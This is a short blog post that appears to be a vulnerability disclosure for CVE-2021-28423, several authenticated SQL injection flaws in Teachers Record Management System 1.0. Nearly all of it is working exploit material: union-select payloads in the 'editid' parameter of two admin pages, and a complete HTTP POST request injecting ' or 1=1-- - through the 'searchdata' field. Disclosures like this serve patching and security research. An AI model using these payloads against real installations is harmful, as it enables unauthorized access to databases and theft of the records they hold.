[CVE-2021-28423] Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)

# Exploit Author: nhattruong.blog
# Version: 1.0
# Tested on: Windows 10 + XAMPP v3.2.4


  1. Go to url http://localhost/admin/index.php
  2. Do login
  3. Execute the payload

SQLi #1:

The entry point in ‘editid’ GET parameter in edit-subjects-detail.php

http://local/admin/edit-subjects-detail.php?editid=-1 union select 1,user(),3-- -

SQLi #2:

The entry point in ‘searchdata’ POST parameter in /admin/search.php

POST /admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://localhost
Connection: close
Referer: http://localhost/trms/admin/search.php
Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0
Upgrade-Insecure-Requests: 1

searchdata=1' or 1=1-- -&search=

SQLi #3:

The entry point in ‘editid’ GET parameter in edit-teacher-detail.php

http://local/admin/edit-teacher-detail.php?editid=-1 union select 1,2,3,4,5,user(),7,8,9,10-- -

Published by Nhat Truong


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: